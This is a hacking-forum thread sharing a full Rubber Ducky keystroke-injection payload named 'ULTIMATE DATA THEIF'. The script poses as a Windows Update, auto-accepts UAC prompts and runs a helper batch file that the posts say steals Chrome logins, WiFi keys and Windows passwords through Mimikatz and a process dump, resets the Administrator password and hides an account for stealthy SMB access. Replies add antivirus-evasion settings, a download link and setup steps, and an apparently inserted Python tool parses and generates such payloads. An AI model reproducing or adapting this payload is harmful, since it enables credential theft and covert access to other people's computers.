UnKn0wnBooof Posted October 25, 2013

Ok, so there's a lot of cool Ducky scripts out there, my personal favourite is the script that steals Windows passwords - AWESOME!!! But do any scripts aim to get more than just a Windows password? Do any of them "Backup" Google Chrome Login Data, WiFi keys, Windows Product Keys or replace the Administrator password or even hide the account so you can have "stealthy" remote access via Windows Shares (known as SMB)? I THINK PAYLOADS SHOULD DO MORE! So... I introduce the ULTIMATE DATA THEIF!!!

Payload:

DELAY 15000
REM Author: Lavanoid Volcanic
REM This script supports Windows XP as well as Vista and 7.
REM I don't have Windows 8 (I really want it though) so I can't test it.
REM This script looks for the drive named "JUNK" because "DUCKY" is too exposing.
REM Step 1: open Notepad and type the batch file (DS.bat) one line at a time.
GUI d
DELAY 500
GUI r
DELAY 1500
STRING notepad.exe
DELAY 200
ENTER
DELAY 1500
STRING @echo off
DELAY 200
ENTER
DELAY 200
STRING Ti
DELAY 200
STRING tle = Installing Windows Update...
DELAY 200
ENTER
STRING @echo Installing Windows Update...
DELAY 200
ENTER
STRING set duck=
DELAY 200
ENTER
STRING COLOR F0
DELAY 200
ENTER
STRING :start
DELAY 200
ENTER
REM XP has no %LOCALAPPDATA%, so it falls through to the diskpart lookup; Vista/7 jump to the wmic lookup.
STRING if not "%LOCALAPPDATA%"=="" goto win_new
DELAY 200
ENTER
STRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "JUNK"') do set duck=%%A
DELAY 200
ENTER
STRING if "%duck%"=="" goto start
DELAY 200
ENTER
STRING set duck=%duck%:
DELAY 200
ENTER
STRING %duck%
DELAY 200
ENTER
STRING CD "Data"
DELAY 200
ENTER
STRING "SCRIPT_EX.exe" "SP.bat"
DELAY 200
ENTER
STRING EXIT
DELAY 200
ENTER
STRING :win_new
DELAY 400
ENTER
DELAY 400
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "JUNK"') do set duck=%%d
DELAY 200
ENTER
STRING if "%duck%"=="" goto start
DELAY 200
ENTER
STRING %duck%
DELAY 200
ENTER
STRING CD "Data"
DELAY 200
ENTER
STRING "SCRIPT_EX.exe" "SP.bat"
DELAY 200
ENTER
STRING EXIT
DELAY 200
ENTER
REM Step 2: save the file as %TEMP%\DS.bat, close Notepad and run it from the Run dialog.
CTRL S
DELAY 1500
STRING %TEMP%\DS.bat
DELAY 1000
ENTER
DELAY 600
ALT Y
DELAY 700
ALT F4
GUI r
DELAY 1500
STRING %TEMP%\DS.bat
ENTER
DELAY 1000
REM Step 3: answer the prompts (UAC etc.) with Yes, then reopen and close Explorer.
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
DELAY 500
ALT y
GUI r
DELAY 1200
STRING explorer.exe
ENTER
DELAY 1500
ALT F4

Unfortunately, the forum only allows a maximum of 500kb of upload space and the extra data is just over 1MB so I put the file on my Dropbox account instead.

Link: https://www.dropbox.com/sh/ad8jegywipd3l76/jo2KqlU3CB

READ ME!!.txt contents:

SCRIPT/PAYLOAD BY LAVANOID VOLCANIC

THE DIRECTORIES ABOVE OR BELOW (DEPENDING ON YOUR CONFIGURATION) SHOULD BE COPIED TO THE ROOT DIRECTORY OF THE DUCKY DRIVE. YOU SHOULD EDIT THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS.

FILE LOCATIONS:
SP.bat -- Data\SP.bat
inject.txt -- Scripts\Projects\Steal_Data\inject.txt
Compiler.bat -- Scripts\Compiler.bat

COMPILER.bat description:
The compiler batch file basically takes away the hassle of entering all those annoying, time-draining commands. If the Compiler.bat file is stored on the Duck, the compiler will ask if you want to install it on the Duck.

WHAT I HOPE:
I hope that my project will be featured in one of the Hak5 videos since I do like some attention. THIS WORLD IS LONELY YOU KNOW!!

Thank you for choosing to spend a bit of your time by poking your nose into my work.
Lord_humungus Posted October 25, 2013

I love a modest person!
mw3demo Posted October 26, 2013

I love passive-aggressiveness! Back on topic, well done Lavanoid! You probably put a bunch of effort into this, and I will give it a test in the near future. Good work doesn't need huge PR though, just look at the Rubber Ducky and the WiFi Pineapple. Your work will get attention if it's good at what it does, just keep putting the hard work in! Good job.
ITHKS Posted October 26, 2013

I will test this later today and give you my thoughts on it! Great work so far! Keep it up
UnKn0wnBooof Posted October 26, 2013 (edited)

Just updated the "Backup_Eraser.bat", "SP.bat" and "Data.zip" files. Just download and extract the "Data.zip".

Changes:
Backup_Eraser.bat - Forgot to replace the directory variable with "Backups"; it was set as "Pass" so it wouldn't locate any backups.
SP.bat - Minor bug fixes and spelling corrections. I misspelt "process_dump" by adding an extra character. Previous value: proccess_dump. Whoops.

Edited October 26, 2013 by Lavanoid
hzm74 Posted October 27, 2013

Hello,

Can you explain a little bit more how all the included files work together? What do I have to do to get it to work? Do I have to run compiler.bat manually? Do I have to run it to configure the payload (inject.bin)? When I want to run the payload, do I need to plug in an extra USB drive named "JUNK" to get the info copied to this drive?

"YOU SHOULD EDIT THE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS." <- What exactly do I need to edit?

Thanks. A little step-by-step tutorial would help.

HzM74
UnKn0wnBooof Posted October 28, 2013

Basically, you run the compiler.bat to compile the inject.txt file into an inject.dat file. The file will be saved in the same directory as the .txt. Just place your ducky scripts in 'Data\Projects\<name of project>' and the file MUST be named 'inject.txt'. The compiler will install on any USB drive as long as it is stored on a USB drive - the name doesn't matter. I used some special variables so the compiler knows what drive it is stored on.

The sp.bat file has a few "triggers" inside of it. Just open it with a notepad editor (I use notepad++) and change the configuration part of it. There is a variable called "avoid_antivirus" and by default that is set as true, so you can set it as false if you wish. When it's set as true, some commands won't execute, such as Chromepass, Mimikatz, etc. However, you can enable the proc_dump program (by changing the other variables) to avoid antivirus but still get a user's password.

inject.txt was designed to find the drive 'JUNK', so you can edit it so it will find a different label instead. It doesn't have to be named 'JUNK'. If you open some of the other files in a text editor, you should be able to figure out what they do. Just extract data.zip and place all the files on the duck.

SP.bat is executed by 'SCRIPT_EX.exe', which has an Administrator manifest so you don't need PowerShell. SCRIPT_EX.exe is launched by the inject.dat file (payload). The compiler is just a tool designed to make your duck experience easier.
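The posted payload works by typing a batch file into Notepad one STRING/ENTER pair at a time, saving it as %TEMP%\DS.bat and running it, and the explanation above says inject.txt is what you edit to hunt for a label other than JUNK. Before trusting or retargeting a payload like this it helps to see exactly what it will type. The Python below is an added example, not the author's Compiler.bat and not part of Data.zip: it parses the classic Ducky Script dialect used above, recovers the text the payload types between key combos, pulls out the batch file written through Notepad (so the split "Ti" + "tle" line comes back whole), lists the volume labels that file searches for with findstr, and does the reverse (batch lines to STRING/DELAY/ENTER). The SAMPLE string is a constructed excerpt of the posted payload; the function names and the "first typed line is notepad.exe" heuristic are my assumptions.

```python
"""Recover what a Rubber Ducky payload types, and build one from a batch file.

Added example, not the author's Compiler.bat and not part of Data.zip. It assumes
the classic Ducky Script dialect used in the posted payload: one command per
line, REM comments (never typed), DELAY, STRING (types text, no Enter), ENTER,
and key combos such as GUI r / CTRL S / ALT y.
"""
import re
from typing import List, Set, Tuple

Event = Tuple[str, str]  # ("text", typed text) | ("delay", ms) | ("key", combo)

# Constructed excerpt of the posted payload (not the full script).
SAMPLE = """\
DELAY 15000
REM Author: Lavanoid Volcanic
GUI r
DELAY 1500
STRING notepad.exe
DELAY 200
ENTER
DELAY 1500
STRING @echo off
ENTER
STRING Ti
DELAY 200
STRING tle = Installing Windows Update...
ENTER
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "JUNK"') do set duck=%%d
ENTER
STRING EXIT
ENTER
CTRL S
DELAY 1500
STRING %TEMP%\\DS.bat
ENTER
ALT Y
ALT F4
"""


def parse_ducky(script: str) -> List[Event]:
    """Turn Ducky Script into an ordered list of keyboard events."""
    events: List[Event] = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "REM":
            continue                      # comments are never sent to the host
        if cmd == "STRING":
            events.append(("text", arg))  # consecutive STRINGs concatenate ("Ti" + "tle")
        elif cmd == "ENTER":
            events.append(("text", "\n"))
        elif cmd == "DELAY":
            events.append(("delay", arg))
        else:
            events.append(("key", line))  # GUI r, CTRL S, ALT y, ALT F4, ...
    return events


def typed_segments(events: List[Event]) -> List[str]:
    """Text typed between key combos. Each combo (Win+R, Ctrl+S, Alt+F4, ...)
    normally changes which window receives the keystrokes, so split there."""
    segments: List[str] = []
    buf: List[str] = []
    for kind, value in events:
        if kind == "text":
            buf.append(value)
        elif kind == "key" and buf:
            segments.append("".join(buf))
            buf = []
    if buf:
        segments.append("".join(buf))
    return segments


def recover_notepad_file(script: str, launcher: str = "notepad.exe") -> List[str]:
    """Lines the payload types into Notepad: the first typed segment whose first
    line launches the editor from the Run dialog (heuristic, my assumption)."""
    for segment in typed_segments(parse_ducky(script)):
        first, _, rest = segment.partition("\n")
        if first.strip().lower() == launcher:
            return rest.rstrip("\n").split("\n")
    return []


def volume_labels_searched(batch_lines: List[str]) -> Set[str]:
    """Labels the batch file greps for in diskpart/wmic output: findstr "LABEL"."""
    labels: Set[str] = set()
    for line in batch_lines:
        labels.update(re.findall(r'findstr\s+"([^"]+)"', line))
    return labels


def batch_to_ducky(batch_lines: List[str], delay_ms: int = 200) -> str:
    """Inverse direction: STRING/DELAY/ENTER per batch line, the way the posted
    payload types DS.bat into Notepad."""
    out: List[str] = []
    for line in batch_lines:
        out.append(f"STRING {line}")
        out.append(f"DELAY {delay_ms}")
        out.append("ENTER")
    return "\n".join(out)


if __name__ == "__main__":
    batch = recover_notepad_file(SAMPLE)
    print("\n".join(batch))
    print("searches for volume label(s):", volume_labels_searched(batch))
```

Run it on a full inject.txt to audit what a payload really types before you compile it; if you change the drive label, the recovered batch file and volume_labels_searched() should show only the new label.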
UnKn0wnBooof Posted October 28, 2013

You also need the Twin Duck firmware (forgot to mention). If you don't want to use Twin Duck, then just put the 'Data' directory on another drive called "JUNK" or whatever you set the drive label as. The compiler should be stored on the duck if you want to install a payload directly on the duck.
UnKn0wnBooof Posted October 31, 2013

Created a new topic. Wouldn't let me edit this one - bummer.

Link: https://forums.hak5.org/index.php?/topic/30740-payload-ultimate-data-theif-new/